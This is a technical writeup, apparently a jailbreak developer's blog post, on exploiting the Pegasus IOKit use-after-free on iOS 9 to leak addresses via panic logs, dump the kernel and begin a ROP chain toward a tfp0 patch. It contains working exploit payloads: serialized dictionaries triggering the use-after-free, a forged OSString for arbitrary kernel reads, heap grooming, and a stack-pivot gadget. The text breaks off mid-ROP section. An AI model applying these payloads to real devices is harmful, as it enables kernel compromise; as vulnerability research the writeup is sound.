cl0ver

Siguza, 25. Dec 2016

tfp0 powered by Pegasus

Make Userland Great Again!

Introduction

On October 4th, @jndok did an amazing writeup on how to exploit the Pegasus vulnerabilities on OS X.
Shortly after that I started working on a tool to exploit them on iOS, in order to add the tfp0 kernel patch that has been missing from Pangu’s 9.0 and 9.2-9.3.3 jailbreaks. On December 4th, my tool had advanced enough for me to release a proof of concept video, although it was still far from complete. I intended to bring it to full compatibility with as many devices and OS versions as possible, but shortly after my PoC, @qwertyoruiopz released a web-based reimplementation of the 9.2-9.3.3 jailbreak, which does have a tfp0 patch. Apparently I’ve also missed some ongoing efforts by Simone Ferrini/Benjamin Randazzo/@angelXwind to create a 32-bit jailbreak based on these vulnerabilities. And on December 15th Ian Beer killed it (once again) with his partial 10.1.1 jailbreak, which qwertyoruiopz is now turning into a full one, probably diverting everyone’s attention away from iOS 9 for good.
Of course huge props to all of them, but that kind of abolishes the need for an iOS 9 tfp0 patch. In light of that, I’m going to release my tool in an unfinished state and instead focus on this writeup.

So, here’s my demonstration of how to use the Pegasus vulnerabilities to dump, exploit and patch an iOS kernel in a way that can be done from within the sandbox and with only publicly available knowledge (i.e. no kernel dumps required).
I’m gonna leave it at applying the tfp0 patch here, but turning this into a full jailbreak should then be as “simple” as installing more patches to the kernel and other parts of the system, using tfp0 + the Mach APIs… it’s just gonna be a whole lot of work.

Now, if you haven’t already, I heavily suggest reading jndok’s writeup before continuing here.
The following are assumed to be well known/understood, and are explained in detail in his writeup:

Note: This project included a lot of “firsts” for me. I’ve never before: done ROP, played with IOKit, MIG or the kernel heap, etc, etc. As such it might be that this writeup contains some misconceptions or stuff that could be done a lot easier, faster or safer.
If you spot anything like that, please let me know (via GitHub issues, Twitter, Email (*@*.net where * = siguza), or whatever).
Also please don’t hesitate to contact me if there’s something you don’t understand, or if you’d like more details on something.

For the record, I’ve worked this up on an iPhone SE (iPhone8,4/N69AP) on 9.3.3/13G34 and an iPod touch 5G (iPod5,1/N78AP) on 9.3.2/ with only information and tools that are publicly available (not as an exercise for myself, but because I didn’t have anything else, lol).

Exploitation overview

Let’s first look at what jndok does on OS X:

That first step is gonna be a problem because on iOS <10, kernels are encrypted. There’s two ways around that:

Hardcoding stuff is ugly and there are hardly any decryption keys available for 64-bit devices (although nice work on that iPhone6,1, @xerub), therefore the former doesn’t seem like such a viable option. Without finding another exploit that allows us to dump the kernel, and without any friends willing and able to provide us with dumped/decrypted kernels, what can we do?
Well, we can corrupt a string. ;)

Let’s assume for a moment that we can get the kernel to still treat our corrupted string as an instance of OSString - then we merely need to change its buffer pointer to wherever we choose, and we can read back arbitrary kernel memory by calling IORegistryEntryGetProperty on that property. We’re gonna be restricted by the maximum MIG message size so we’ll have to do it in chunks, but we can effectively dump the entire kernel this way!
Now back to our assumption: How do we make the kernel treat our corrupted string still as an OSString? By setting the string’s vtable to the actual OSString vtable. In order to be able to do that, we’re gonna need to learn its address by some other means though.

So how do we gain knowledge of that address?
Note that vtables are stored in the __DATA.__const section, so once we know our vtab’s offset from the kernel base as well as the kernel slide, we’re all set.
Unfortunately, as far as I’m aware the vtable pointer cannot be obtained at runtime (through the Pegasus vulnerabilities and without prior knowledge, that is). But it’s only a single value, so hardcoding it is a lot more reasonable. Obtaining it once would be enough then.
Let’s see what we can come up with:

(Note: My iPhone SE and iPod touch 5G fell into the latter two categories.)

At this point we’ve conceptually taken care of the first point on jndok’s list. So what else is there?

We want to install a kernel patch to allow for tfp0, so we obviously need to add that to the list. Installing a kernel patch through ROP sounds unnecessarily complicated to me though, so let’s use ROP to merely retrieve the kernel task first without any patch, and then use the Mach APIs on the kernel to put the actual patch in place. And since we’re doing that using only methods accessible from within the sandbox, we can skip privilege escalation entirely.

Now, at last we have an idea what we want our process to look like:

With that laid out, let’s look at the details.

Preparations

Before we can actually get to pwning, we need to set up a few things.

Setting up the build environment

The Pegasus vulnerabilities are within IOKit, so linking against the IOKit framework is advisable. Apple’s iOS SDK doesn’t come with IOKit headers (anymore?), so we need to get them from elsewhere. We could copy them in from the IOKitUser source… or we could use those of OS X.
For that we create a local ./include directory that we later pass to the compiler with -I./include, and to where we simply symlink the IOKit header directory:

ln -s /System/Library/Frameworks/IOKit.framework/Headers ./include/IOKit

We also use some IOKit MIG functions, which are perfectly available on 32-bit (iokitmig.h) but private (non-exported) on 64-bit.
We could write a 32-bit binary able to exploit both a 32-bit and 64-bit kernel, but having the same data types and sizes as the kernel is just so much more convenient. And after all, generating the MIG routines yourself and statically linking against them turns out to be simple enough. I found very little info on this on the web though, so here’s the process in detail:

There’s a mig utility to create C source files from .defs, in the case of the IOKit MIG functions, xnu/osfmk/device/device.defs.
We run it as xcrun -sdk iphoneos mig to get the iOS environment and add -arch arm64 to set the correct target architecture (I’m not sure whether the generated C code differs at all between architectures, but at some point it might, so I’m trying to do this the correct way). Examining the file, we can also see that if the IOKIT macro is not defined, we get hardly anything, so we’re gonna add a -DIOKIT to our flags. Lastly, we need some other .defs files to be included but we can’t specify xnu/osfmk as an include directory because it contains some files that will #error when the architecture is neither i386 nor x86_64, so we symlink the following files (from xnu/osfmk) to our local ./include directory:

mach/clock_types.defs
mach/mach_types.defs
mach/std_types.defs
mach/machine/machine_types.defs

Finally we can run:

xcrun -sdk iphoneos mig \
-arch arm64 \
-DIOKIT \
-I./include \
xnu/osfmk/device/device.defs

This will generate three files:

iokit.h
iokitServer.c
iokitUser.c

Including iokit.h and iokitUser.c in our program will provide us with the full set of IOKit MIG functions. iokitServer.c isn’t needed as such, but it can still serve as a good reference to understand how exactly the kernel passes our MIG calls to its is_io_* functions.

(In my actual implementation I used /usr/include instead of xnu/osfmk because I can’t assume people have the XNU source available in a predefined location, but that might stop working when XNU changes enough.)

Now we’re fully equipped to play with IOKit on both armv7 and arm64! :D

Recap: IOKit, data structures and the info leak

Without further ado, a quick recap/reference on some key points:

Part One: Obtaining the OSString vtable address

All of OSData, OSString and OSSymbol contain both a buffer pointer and length field, which we could abuse together with IORegistryEntryGetProperty to retrieve arbitrary kernel memory. So in theory, we could overwrite our freed OSString to mimic any of these. However:

So the OSString vtable is the one of choice. Now let’s look at how to get it.

The good: decrypted kernels

If keys are available, we can just grab the kernelcache from our IPSW, run it through xpwntool(-lite) and lzssdec, and we’ve got the raw kernel binary.
Since decrypted kernels are symbolicated, we merely have to search its symbol table for __ZTV8OSString (symbols starting with __ZTV are vtables):

$ nm kernel | grep __ZTV8OSString
803ece8c S __ZTV8OSString           # iPhone4,1 9.3.3
803f4e8c S __ZTV8OSString           # iPhone5,4 9.3.3
ffffff80044ef1e0 S __ZTV8OSString   # iPhone6,1 9.3.3

However, as one can see with a hex viewer (I’m using radare2 here; the first column is offsets, the rest is data):

$ r2 -c '0x803f4e8c; xw 32' -q iPhone5,4/kernel 2>/dev/null
0x803f4e8c  0x00000000 0x00000000 0x80321591 0x80321599  ..........2...2.
0x803f4e9c  0x8030d605 0x8030d4a5 0x8030d5fd 0x8030d5f5  ..0...0...0...0.
$ r2 -c '0xffffff80044ef1e0; xq 64' -q iPhone6,1/kernel 2>/dev/null
0xffffff80044ef1e0  0x0000000000000000  0x0000000000000000   ................
0xffffff80044ef1f0  0xffffff80043ea7c4  0xffffff80043ea7d0   ..>.......>.....
0xffffff80044ef200  0xffffff80043cea00  0xffffff80043ce864   ..<.....d.<.....
0xffffff80044ef210  0xffffff80043ce9f0  0xffffff80043ce9e0   ..<.......<.....

There are two machine words before the actual vtable, so the real address we’re looking for is at offset 2 * sizeof(void*) from the __ZTV... address.
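The adjustment is small enough to get wrong by hand, so here is a minimal sketch of it. The helper name vtab_from_ztv is made up for illustration and is not part of cl0ver; the pointer size is passed in explicitly so the same code covers both 32-bit and 64-bit kernels.

```c
#include <stdint.h>

// Hypothetical helper: turn the address of a __ZTV... symbol into the address
// that objects actually store as their vtable pointer, by skipping the two
// machine words that precede the first virtual function pointer.
static uint64_t vtab_from_ztv(uint64_t ztv_addr, uint64_t ptr_size)
{
    return ztv_addr + 2 * ptr_size;
}
```

For the symbols listed above, this turns 0x803f4e8c into 0x803f4e94 (4-byte pointers) and 0xffffff80044ef1e0 into 0xffffff80044ef1f0 (8-byte pointers).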

The bad: panic logs

I stumbled across this method by accident while trying to play with OSStrings while they were freed (which won’t work due to heap poisoning).
Anyway, here are a few raw facts:

See what I’m getting at? :P
Here’s a visualization:

Normal heap layout

Now what happens when retain() is called on an OSString that was freed, but not yet reallocated?
In other words, what happens when we combine the above?

Reference to node in freelist

So what used to be our object’s vtable pointer is now a pointer to the next node in the freelist. And what is treated as a pointer to retain() is the value just out of bounds of that next node.
Now, is there any way of predicting what value that area of memory is gonna hold?

Now that we know what could be there, how can we make that happen? How can we arrange for our freed OSString to lie next to another OSString?
By making lots of strategic allocations and deallocations (hooray for Heap Feng Shui). And we can do that by passing a dictionary with kOSSerializeString entries to io_service_open_extended for allocation, and the returned client handle to IOServiceClose for deallocation. So:

Visualized again:

Heap Feng Shui

(The dictionaries to achieve this are straightforward and make no use of any bugs so far.)

Now we’re gonna parse a rather simple dictionary:

uint32_t dict[5] =
{
    kOSSerializeMagic,                                              // Magic
    kOSSerializeEndCollection | kOSSerializeDictionary | 2,         // Dictionary with 2 entries

    kOSSerializeString | 4,                                         // String that'll get freed
    *((uint32_t*)"str"),
    kOSSerializeEndCollection | kOSSerializeObject | 1,             // Call ->retain() on the freed string
};
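In case the tag words in that dictionary look opaque: each 32-bit word packs a type, a length or index, and an end-of-collection flag. The following is a rough sketch of how such a word splits apart. The constant values are written down from my reading of XNU's binary serialization header and should be treated as an assumption to verify against the source; tag_t and decode_tag are names invented for this example.

```c
#include <stdbool.h>
#include <stdint.h>

// Assumed values, to be checked against XNU's headers.
#define kOSSerializeDictionary    0x01000000U
#define kOSSerializeSymbol        0x08000000U
#define kOSSerializeString        0x09000000U
#define kOSSerializeData          0x0a000000U
#define kOSSerializeObject        0x0c000000U
#define kOSSerializeTypeMask      0x7F000000U
#define kOSSerializeDataMask      0x00FFFFFFU
#define kOSSerializeEndCollection 0x80000000U

// Hypothetical decoded view of one tag word.
typedef struct
{
    uint32_t type;  // one of the kOSSerialize* type constants
    uint32_t len;   // byte length, entry count, or object index, depending on type
    bool     end;   // true if this is the last element of the enclosing collection
} tag_t;

static tag_t decode_tag(uint32_t word)
{
    tag_t t;
    t.type = word & kOSSerializeTypeMask;
    t.len  = word & kOSSerializeDataMask;
    t.end  = (word & kOSSerializeEndCollection) != 0;
    return t;
}
```

Read this way, the last word of the dictionary above is an object reference to index 1 that also closes the dictionary, and index 1 is the string created by the word before it.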

kOSSerializeString will cause an OSString to get allocated, hopefully in one of those lonely holes we’ve punched into the heap, and when it is freed again shortly after, we’re left with objsArray[1] holding a pointer to that chunk of memory that is surrounded by allocated OSStrings.
kOSSerializeObject will then attempt to call retain() on that chunk of freed memory, thus unfolding the process explained above, ultimately causing a kernel panic and logging the vtable address in the panic log:

panic(cpu 0 caller 0xffffff801befcc1c): "Kernel instruction fetch abort: pc=0xffffff801c2ef1f0 iss=0xf far=0xffffff801c2ef1f0. Note: the faulting frame may be missing in the backtrace."
Debugger message: panic
OS version: 13G34
Kernel version: Darwin Kernel Version 15.6.0: Mon Jun 20 20:10:22 PDT 2016; root:xnu-3248.60.9~1/RELEASE_ARM64_S8000
iBoot version: iBoot-2817.60.2
secure boot?: YES
Paniclog version: 5
Kernel slide:     0x0000000017e00000
Kernel text base: 0xffffff801be04000
Epoch Time:        sec       usec
  Boot    : 0x58225b8c 0x00000000
  Sleep   : 0x00000000 0x00000000
  Wake    : 0x00000000 0x00000000
  Calendar: 0x58225bec 0x00028e96

Panicked task 0xffffff811d67bdc0: 78 pages, 1 threads: pid 748: cl0ver
panicked thread: 0xffffff811f2f9000, backtrace: 0xffffff8012f03120
          lr: 0xffffff801bf043c4  fp: 0xffffff8012f03170
          lr: 0xffffff801be2e11c  fp: 0xffffff8012f031d0
          lr: 0xffffff801befcc1c  fp: 0xffffff8012f032c0
          lr: 0xffffff801befb1f0  fp: 0xffffff8012f032d0
          lr: 0xffffff801c1f0678  fp: 0xffffff8012f03720
          lr: 0xffffff801c25b4cc  fp: 0xffffff8012f03840
          lr: 0xffffff801bedaa00  fp: 0xffffff8012f038a0
          lr: 0xffffff801be194c8  fp: 0xffffff8012f03a30
          lr: 0xffffff801be27b78  fp: 0xffffff8012f03ad0
          lr: 0xffffff801befd6b0  fp: 0xffffff8012f03ba0
          lr: 0xffffff801befbd40  fp: 0xffffff8012f03c90
          lr: 0xffffff801befb1f0  fp: 0xffffff8012f03ca0
          lr: 0x00000001819b0fd8  fp: 0x0000000000000000

0xffffff801c2ef1f0 - 0x0000000017e00000 = 0xffffff80044ef1f0, there we go.
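If you would rather not do that subtraction by hand, here is a minimal sketch that pulls both values out of the panic log text. It assumes the arm64 log format shown above (a "pc=" field and a "Kernel slide:" line); the 32-bit logs are laid out differently. The function names are invented for this example and do not appear in cl0ver.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

// Returns the hexadecimal value that follows `label` in `log`, or 0 if the
// label does not occur. strtoull skips leading whitespace and accepts "0x".
static uint64_t hex_after(const char *log, const char *label)
{
    const char *p = strstr(log, label);
    if(p == NULL)
    {
        return 0;
    }
    return (uint64_t)strtoull(p + strlen(label), NULL, 16);
}

// Faulting pc minus kernel slide, i.e. the unslid address the kernel tried to
// branch to. In the scenario above that is the OSString vtable address.
static uint64_t unslid_pc_from_panic(const char *log)
{
    uint64_t pc    = hex_after(log, "pc=");
    uint64_t slide = hex_after(log, "Kernel slide:");
    return pc - slide;
}
```

Feeding it the log above should yield the same 0xffffff80044ef1f0.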

The full implementation of this can be found in the uaf_panic_leak_vtab function in uaf_panic.c.

The ugly: semi-blind guessing

Disclaimer: I can’t promise that this will work for every device and OS version, but it did on my iPod.

Our target is iPod5,1/9.3.2, so let’s first look at 9.3.2 for some other devices:

$ jtool -l -v iPhone4,1/kernel | head -9
LC 00: LC_SEGMENT               Mem: 0x80001000-0x803e6000      File: 0x0-0x3e5000      r-x/r-x __TEXT
        Mem: 0x80002000-0x803931a8      File: 0x00001000-0x003921a8             __TEXT.__text   (Normal)
        Mem: 0x803931b0-0x803a916c      File: 0x003921b0-0x003a816c             __TEXT.__const  
        Mem: 0x803a916c-0x803e59dd      File: 0x003a816c-0x003e49dd             __TEXT.__cstring        (C-String Literals)
LC 01: LC_SEGMENT               Mem: 0x803e6000-0x8045c000      File: 0x3e5000-0x411000 rw-/rw- __DATA
        Mem: 0x803e6000-0x803e60e8      File: 0x003e5000-0x003e50e8             __DATA.__nl_symbol_ptr  
        Mem: 0x803e60e8-0x803e61f0      File: 0x003e50e8-0x003e51f0             __DATA.__mod_init_func  (Module Init Function Ptrs)
        Mem: 0x803e61f0-0x803e62f4      File: 0x003e51f0-0x003e52f4             __DATA.__mod_term_func  (Module Termination Function Ptrs)
        Mem: 0x803e7000-0x803f67a0      File: 0x003e6000-0x003f57a0             __DATA.__const
$ nm iPhone4,1/kernel | grep __ZTV8OSString
803ece8c S __ZTV8OSString
$ jtool -l -v iPhone5,4/kernel | head -9
LC 00: LC_SEGMENT               Mem: 0x80001000-0x803ee000      File: 0x0-0x3ed000      r-x/r-x __TEXT
        Mem: 0x80002000-0x8039acc0      File: 0x00001000-0x00399cc0         __TEXT.__text   (Normal)
        Mem: 0x8039acc0-0x803b0c8c      File: 0x00399cc0-0x003afc8c         __TEXT.__const
        Mem: 0x803b0c8c-0x803ed894      File: 0x003afc8c-0x003ec894         __TEXT.__cstring        (C-String Literals)
LC 01: LC_SEGMENT               Mem: 0x803ee000-0x80464000      File: 0x3ed000-0x419000 rw-/rw- __DATA
        Mem: 0x803ee000-0x803ee0ec      File: 0x003ed000-0x003ed0ec         __DATA.__nl_symbol_ptr
        Mem: 0x803ee0ec-0x803ee1f4      File: 0x003ed0ec-0x003ed1f4         __DATA.__mod_init_func  (Module Init Function Ptrs)
        Mem: 0x803ee1f4-0x803ee2f8      File: 0x003ed1f4-0x003ed2f8         __DATA.__mod_term_func  (Module Termination Function Ptrs)
        Mem: 0x803ef000-0x803fe790      File: 0x003ee000-0x003fd790         __DATA.__const
$ nm iPhone5,4/kernel | grep __ZTV8OSString
803f4e8c S __ZTV8OSString

As we can see, __DATA.__const has different offsets, depending on the device, and so does the OSString vtable.
However, if we subtract the former from the latter: 0x803ece8c - 0x803e7000 = 0x803f4e8c - 0x803ef000 = 0x5e8c. It turns out that the vtable’s offset from __DATA.__const is the same for both. Could it be the same for the iPod5,1 as well?

First we need to learn the base address of __DATA.__const. That address is stored in the kernel’s mach header at offset 0x244. Since the data segment is non-executable, branching to that location will cause a panic.
Thus we use the UaF to construct an OSString whose vtable pointer points to 4 machine words (16 bytes on this 32-bit device) before offset 0x244, i.e. kernel_base + kernel_slide + 0x234, so that a call to retain() will give us:

Incident Identifier: 0E7ED4DF-23F4-4669-A772-8B46A8D04BF2
CrashReporter Key:   b25fc727e5bd42cc472643168319ec8bb9b18dec
Hardware Model:      iPod5,1
Date/Time:           2016-12-17 23:42:38.38 +0100
OS Version:          iOS 9.3.2 (13F69)

panic(cpu 0 caller 0x<ptr>): sleh_abort: prefetch abort in kernel mode: fault_addr=0x857e7000
r0:   0x96961a40  r1: 0x857e7000  r2: 0x8c000001  r3: 0x00000001
r4:   0x8b07d7f0  r5: 0x00000001  r6: 0x00000034  r7: 0x800abd34
r8:   0x96961a40  r9: 0x00000034 r10: 0x80004034 r11: 0x00000001
r12:  0x85793043  sp: 0x800abcb4  lr: 0x8571eb69  pc: 0x857e7000
cpsr: 0x80000013 fsr: 0x0000000f far: 0x857e7000

Debugger message: panic
OS version: 13F69
Kernel version: Darwin Kernel Version 15.5.0: Mon Apr 18 16:44:05 PDT 2016; root:xnu-3248.50.21~4/RELEASE_ARM_S5L8942X
Paniclog version: 3
Kernel slide:     0x0000000005400000
Kernel text base: 0x85401000
  Boot    : 0x5855be8a 0x00000000
  Sleep   : 0x00000000 0x00000000
  Wake    : 0x00000000 0x00000000
  Calendar: 0x5855bf22 0x0009c5b9

Panicked task 0xc65784c8: 926 pages, 8 threads: pid 164: v3tta
panicked thread: 0xc67478b0, backtrace: 0x800aba00
        0x854c9b63
        0x854c9e39
        0x85420f63
        0x854ccc79
        0x854c6660
        0x8576fa7d
        0x854ab1c9
        0x85410c61
        0x8541be69
        0x854c62fc

Subtracting the kernel slide from the value in pc yields the unslid address of __DATA.__const: 0x803E7000.
That happens to be the same as for the iPhone4,1, so we assume our vtable address to be 0x803ece8c.
We can verify whether that is actually the case in the next step.
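The guess itself boils down to two lines of arithmetic. A minimal sketch for the 32-bit case, assuming the 0x5e8c offset observed on the two reference kernels also holds for the target (which is exactly the assumption being tested); the function and macro names are made up for this example:

```c
#include <stdint.h>

// Offset of __ZTV8OSString from the start of __DATA.__const, as computed from
// the two kernels compared above (0x803ece8c - 0x803e7000).
#define ZTV_OSSTRING_OFF_FROM_DATA_CONST 0x5e8cU

// fault_pc:     pc value from the panic log (slid address of __DATA.__const)
// kernel_slide: "Kernel slide" value from the same log
static uint32_t guess_ztv_osstring(uint32_t fault_pc, uint32_t kernel_slide)
{
    uint32_t data_const = fault_pc - kernel_slide;  // unslid __DATA.__const base
    return data_const + ZTV_OSSTRING_OFF_FROM_DATA_CONST;
}
```

With the values from the log above (pc 0x857e7000, slide 0x05400000) this gives 0x803ece8c for the symbol, and the pointer actually stored in objects is two machine words further, at 0x803ece94.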

The full implementation of this can be found in the uaf_panic_leak_DATA_const_base and uaf_panic_read functions in uaf_panic.c.

Part Two: Dumping the kernel

With the OSString vtable and the kernel slide both known, we can construct valid(-ish) strings that point to wherever we choose.
Let’s see how we can use that to read a fixed amount of memory from an arbitrary address:

We start with an OSString:

OSString osstr;

Obviously it’s gonna need its vtable and the address we want to read from:

osstr.vtab = 0xffffff80044ef1f0 + get_kernel_slide(); // or 0x803ece94
osstr.string = address;

I’ll get back to the length later, for now we’re just gonna use the maximum MIG message size, i.e. 4096 bytes:

osstr.length = 0x1000;

Now there’s two fields left: retainCount and flags.

The retain count we set to something unrealistically high, so that a call to release() is never actually going to free anything. We want this because our OSString is actually the buffer of an OSData, which will be managed and freed as such, and interfering with that would only cause chaos and destruction.

osstr.retainCount = 100;

As for flags, there is exactly one recognised by OSString: kOSStringNoCopy, indicating the string doesn’t own its buffer and will not free or modify it.
I’m not sure it even makes a difference in this case, but we might as well set it:

osstr.flags = kOSStringNoCopy;
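The field accesses above presuppose a C struct that mirrors the in-memory layout of the kernel's OSString. The following is a sketch of what such a mirror could look like, inferred from the fields named in this section; the definition used in the actual tool may differ, the value of kOSStringNoCopy is my recollection of XNU's OSString header and should be checked, and make_read_string is a made-up helper.

```c
#include <stddef.h>
#include <stdint.h>

#define kOSStringNoCopy 0x00000001  // assumed value, verify against XNU

// Mirror of the kernel object's layout. On LP64 the compiler inserts 4 bytes
// of padding after `length`, giving 32 bytes total; on 32-bit it is 20 bytes.
typedef struct
{
    uintptr_t vtab;         // pointer to the OSString vtable (slid)
    uint32_t  retainCount;  // reference count
    uint32_t  flags;        // kOSStringNoCopy or 0
    uint32_t  length;       // number of bytes the string claims to hold
    uintptr_t string;       // buffer pointer, i.e. the address to read from
} OSString;

// Hypothetical helper bundling the assignments from this section.
static OSString make_read_string(uintptr_t slid_vtab, uintptr_t address, uint32_t length)
{
    OSString s;
    s.vtab        = slid_vtab;
    s.retainCount = 100;
    s.flags       = kOSStringNoCopy;
    s.length      = length;
    s.string      = address;
    return s;
}
```

Keeping the struct the same size as the kernel object matters because the OSData buffer has to be allocated from the same zone as the freed string.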

Now we have to build a payload for OSUnserializeBinary. Conceptually, it should suffice to have a dictionary containing:

If you test this in practice, however, you’ll always get a panic. This is because during deallocation, when release() gets called on the last of the above, the OSData before it will have been deallocated already, along with its buffer, which causes the underlying memory to get poisoned, so that a call to release() will end up trying to branch to some 0xdeadbeef.
We can work around that, however, by adding another kOSSerializeObject to the end of the dict, referencing the OSData, causing it to be retained until after release() has been called on the reference to the overwritten string.

Implementing all of the above, we get:

OSString osstr =
{
    .vtab = 0xffffff80044ef1f0 + get_kernel_slide(),                // or 0x803ece94
    .retainCount = 100,
    .flags = kOSStringNoCopy,
    .length = 0x1000,
    .string = address,
};
uint32_t *data = (uint32_t*)&osstr;
uint32_t dict[11 + sizeof(OSString) / sizeof(uint32_t)] =
{
    kOSSerializeMagic,                                              // Magic
    kOSSerializeEndCollection | kOSSerializeDictionary | 6,         // Dictionary with 6 entries

    kOSSerializeString | 4,                                         // String that will get freed
    *((uint32_t*)"str"),
    kOSSerializeData | sizeof(OSString),                            // OSData with same size as OSString
#ifdef __LP64__
    data[0],                                                        // vtable pointer (lower half)
    data[1],                                                        // vtable pointer (upper half)
    data[2],                                                        // retainCount
    data[3],                                                        // flags
    data[4],                                                        // length
    data[5],                                                        // (padding)
    data[6],                                                        // string pointer (lower half)
    data[7],                                                        // string pointer (upper half)
#else
    data[0],                                                        // vtable pointer
    data[1],                                                        // retainCount
    data[2],                                                        // flags
    data[3],                                                        // length
    data[4],                                                        // string pointer
#endif

    kOSSerializeSymbol | 4,                                         // Name that we're gonna use to retrieve bytes
    *((uint32_t*)"ref"),
    kOSSerializeObject | 1,                                         // Reference to the overwritten OSString

    kOSSerializeSymbol | 4,                                         // Create a reference to the OSData
    *((uint32_t*)"sav"),
    kOSSerializeEndCollection | kOSSerializeObject | 2,
};

With that figured out, back to the length that we put aside earlier: MIG lets us pass at most 4096 bytes in or out of the kernel at once, so in order to dump arbitrary amounts of memory, we need to invoke the UaF in a loop (I don’t think this needs more explaining, it’s just math).
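For completeness, the loop could look roughly like this. It is a sketch of the chunking only, not the code from uaf_read.c: the single-read primitive is abstracted behind a hypothetical callback type (read_chunk_fn), and fake_read is a stand-in that reads from an ordinary buffer so the loop can be tried outside the kernel.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_CHUNK 0x1000  // per-call limit quoted above

// Hypothetical primitive: read `len` (<= MAX_CHUNK) bytes from `addr` into
// `buf`. Returns 0 on success. In the real tool this would be one UaF round.
typedef int (*read_chunk_fn)(uint64_t addr, void *buf, size_t len, void *ctx);

// Reads `len` bytes starting at `addr` by issuing as many chunked reads as needed.
static int read_chunked(read_chunk_fn read_chunk, void *ctx, uint64_t addr, void *buf, size_t len)
{
    uint8_t *out = buf;
    while(len > 0)
    {
        size_t n = len < MAX_CHUNK ? len : MAX_CHUNK;
        int ret = read_chunk(addr, out, n, ctx);
        if(ret != 0)
        {
            return ret;  // give up on the first failed chunk
        }
        addr += n;
        out  += n;
        len  -= n;
    }
    return 0;
}

// Stand-in reader for experiments: treats `ctx` as the base of a byte array
// and `addr` as an index into it, and counts how often it was invoked.
static size_t fake_calls = 0;
static int fake_read(uint64_t addr, void *buf, size_t len, void *ctx)
{
    memcpy(buf, (const uint8_t*)ctx + addr, len);
    ++fake_calls;
    return 0;
}
```

Reading 0x2800 bytes this way takes three calls: two full chunks and one of 0x800 bytes.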

I’ve implemented the concept up until here in the uaf_get_bytes and uaf_read_naive functions in uaf_read.c. They’re not used anymore, but I left them in for demo purposes.

Now, with the above it is already possible to dump the kernel… provided you wait a sufficient amount of time between invocations. If you don’t, you’re likely to see your device panic. That is because ultimately, the UaF is a race condition.
When our OSString is freed, it gets added to the top of its zone’s freelist, and we count on it being there when our OSData’s buffer is allocated. If that is not the case, then the subsequent call to retain() will almost certainly cause a panic.
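To make that assumption concrete, here is a toy model of a last-in-first-out freelist. It is deliberately simplistic and is not how XNU's zone allocator is actually implemented (no poisoning, no locking, no other threads); all names are invented. It only shows the two properties the exploit relies on: a freed chunk's first word is reused as the freelist link, and the next allocation of the same size hands that same chunk back.

```c
#include <stddef.h>
#include <stdint.h>

#define CHUNK_SIZE 32
#define NUM_CHUNKS 4

// While free, the first word of a chunk links to the next free chunk.
// While allocated, the whole chunk belongs to the caller.
typedef union chunk
{
    union chunk *next;
    uint8_t      bytes[CHUNK_SIZE];
} chunk_t;

typedef struct
{
    chunk_t  storage[NUM_CHUNKS];
    chunk_t *freelist;  // most recently freed chunk first
} toy_zone_t;

static void toy_zone_init(toy_zone_t *z)
{
    z->freelist = NULL;
    for(size_t i = 0; i < NUM_CHUNKS; ++i)
    {
        z->storage[i].next = z->freelist;
        z->freelist = &z->storage[i];
    }
}

static void *toy_zalloc(toy_zone_t *z)
{
    chunk_t *c = z->freelist;
    if(c != NULL)
    {
        z->freelist = c->next;  // pop the head
    }
    return c;
}

static void toy_zfree(toy_zone_t *z, void *p)
{
    chunk_t *c = p;
    c->next = z->freelist;      // overwrites what used to be the first word
    z->freelist = c;            // push on top
}
```

In this model, freeing a chunk and immediately allocating again always returns the same chunk. Any allocation or deallocation of that size squeezed in between, for example by another thread, breaks that guarantee.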

Now, I went through OSUnserializeBinary multiple times and I’m pretty confident that it doesn’t do any allocations or deallocations between our two key events… so from the perspective of a single thread, our assumption should hold. But in the multithreaded environment that is XNU, we’re very far from that.
There are a couple of things that can happen, for a couple of different reasons, and with a couple of different consequences:

With all of the above I managed to make dumping reasonably stable (I never got a panic from the command line anymore, and panicked about 20% of the time from within the sandbox) and take less than a minute. At that point I gave up on trying to improve it further and instead added functionality to cache the required information (see offsets.c), so that once the kernel had been dumped, it would never have to be done again on that device.
Feel free to fiddle around with it though, and hopefully create a pull request if you manage to make it faster or more reliable. :)

With arbitrary read now more or less stable, dumping the kernel is trivial. But for the sake of completeness:

The full implementation of this can be found in the uaf_read and uaf_dump_kernel functions in uaf_read.c.

Part Three: ROP

Note: I haven’t done any of the following on 32-bit yet, and I’m not sure whether I will. For now this is 64-bit only.

Pivoting and restoring the stack

If you’ve read jndok’s writeup or have played with the Pegasus vulnerabilities yourself, then you know that our UaF gives us exactly one ROP gadget worth of execution. So we need to find a stack pivot.
But before we can go off and search for one, we first need to determine what requirements we have for it:

A good point to start is to examine which registers hold which values. By examining the disassembly of OSUnserializeXML (and possibly looking at panic logs), I made out the following:

Let’s first sort out those we surely cannot use as a stack pivot loading address:

x0 or x28 would be perfect, as they point to a memory area whose contents are entirely controllable. However, I was unable to find a gadget that loads from x0 or x28.

I had my fair share of trouble finding a usable stack pivot. I looked at some docs discussing stack pivots on x86 and 32-bit ARM, and I have to say it looks to me like on those architectures it’s a lot easier than on arm64!
The only thing that I found at all mentioning stack pivots on arm64 was @qwertyoruiopz, saying it’s amazingly easy to find them. Luca, should you happen to read this, care to elaborate? :)

Now, I did eventually find a usable gadget:

0xffffff8005aea01c      3d79c1a8  ldp x29, x30, [x9], 0x10
0xffffff8005aea020      ff430091  add sp, sp, 0x10
0xffffff8005aea024      c0035fd6  ret

The way we use this gadget is as follows:

At that point we jump to a gadget that loads a value from the stack and stores it in any register that is convenient. And then we finally have both the address of the original stack frame, as well as a fake stack from which we’re running now. Of course, since the loaded value is x29 and not sp, we need to subtract the stack size of the calling function from it, which in the case of is_io_service_open_extended is 0x120, but that’s a trivial task now. It’s also a good idea to store that value to RAM somewhere, so that our ROP chain doesn’t corrupt it by accident.

After saving a pointer to the last stack frame and pivoting the stack, we run whatever ROP we actually wanted to run in the first place. Let’s put that aside for a moment though, I’ll get to it in a bit.

At the end of our ROP chain we need to make use of that stack pointer we saved earlier, and (preferably) return to somewhere within OSUnserializeXML.
The easiest way to restore the saved stack frame is this: when we save it to RAM at the beginning of our chain, we don’t just write it anywhere, but to a location further down on our stack, more precisely the location where x29 will be loaded from when we load our return address into x30. That requires knowledge of the exact length of our ROP chain and some precise counting, but it’s easily doable.
Paired with that we’re gonna need an address to return to, for simplicity most likely one within OSUnserializeXML. I chose 0xffffff80043f08c4 for now, which is at the end of OSUnserializeXML:

0xffffff80043f08c4      130080d2       movz x19, 0
0xffffff80043f08c8      e00313aa       mov x0, x19
